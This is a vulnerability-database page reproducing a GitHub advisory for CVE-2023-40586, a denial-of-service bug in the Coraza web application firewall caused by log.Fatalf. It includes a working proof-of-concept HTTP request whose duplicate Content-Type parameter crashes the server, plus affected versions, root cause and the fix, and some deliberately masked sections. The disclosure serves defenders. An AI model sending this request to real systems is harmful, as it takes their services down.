7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-40586

GHSA ID

GHSA-c2pj-v37r-2p6h

EPSS Score

0.45818%

CWE

CWE-400

Published

6/26/2023

Updated

11/10/2023

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2023-40586

CVE-2023-40586: Coraza has potential denial of service vulnerability

Summary

Due to the misuse of log.Fatalf, the application using coraza crashed after receiving crafted requests from attackers.

Details

https://github.com/corazawaf/coraza/blob/82157f85f24c6107667bf0f686b71a72aafdf8a5/internal/bodyprocessors/multipart.go#L26-L29 The bodyprocessors of multipart uses log.Fatalf to handle errors from the mime.ParseMediaType, but log.Fatalf calls os.Exit directly after logging the error. https://github.com/golang/go/blob/a031f4ef83edc132d5f49382bfef491161de2476/src/log/log.go#L288-L291 This means that the application will immediately crash after receiving a malicious request that triggers an error in mime.ParseMediaType.

PoC

The server can be demonstrated by https://github.com/corazawaf/coraza/tree/main/examples/http-server

After sending this request

POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: curl/8.1.2
Accept: */*
Content-Length: 199
Content-Type: multipart/form-data; boundary=------------------------5fa6351b877326a1; a=1; a=2
Connection: close

--------------------------5fa6351b877326a1
Content-Disposition: form-data; name="file"; filename="123"
Content-Type: application/octet-stream

123

--------------------------5fa6351b877326a1--

The server will crash immediately. The a=1; a=2 in Content-Type makes mime: duplicate parameter name error.

Impact

I believe the vulnerability was introduced by the following commit: https://github.com/corazawaf/coraza/commit/24af0c8cf4f10bab558740b595712be3b85493ec.

Mitigation

The error from mime.ParseMediaType should return directly.

(GitHub Advisory)

7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-40586

GHSA ID

GHSA-c2pj-v37r-2p6h

EPSS Score

0.45818%

CWE

CWE-400

Published

6/26/2023

Updated

11/10/2023

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/corazawaf/coraza/v3	go	>= 3.0.0, < 3.0.1	3.0.1
github.com/corazawaf/coraza/v2	go	>= 2.0.0, <= 2.0.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from the error handling in multipartBodyProcessor.ProcessRequest where log.Fatalf was used to handle mime.ParseMediaType errors. The commit diff shows this was replaced with proper error return in the fix (24af0c8). log.Fatalf terminates the process via os.Exit (per Go's log package), making any application using this code vulnerable to crash on malicious inputs. The PoC demonstrates this by triggering a duplicate parameter error in Content-Type parsing.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry *u* to t** misus* o* `lo*.**t*l*`, t** *ppli**tion usin* *or*z* *r*s*** **t*r r***ivin* *r**t** r*qu*sts *rom *tt**k*rs. ### **t*ils *ttps://*it*u*.*om/*or*z*w**/*or*z*/*lo*/****************************************/int*rn*l/*o*ypro**ss

Reasoning

T** vuln*r**ility st*ms *rom t** *rror **n*lin* in `multip*rt*o*yPro**ssor.Pro**ssR*qu*st` w**r* `lo*.**t*l*` w*s us** to **n*l* `mim*.P*rs*M**i*Typ*` *rrors. T** *ommit *i** s*ows t*is w*s r*pl**** wit* prop*r *rror r*turn in t** *ix (*******). `lo*

7.5

Basic Information

Concerned about an active attack path?

CVE-2023-40586: Coraza has potential denial of service vulnerability

Summary

Details

PoC

Impact

Mitigation

7.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI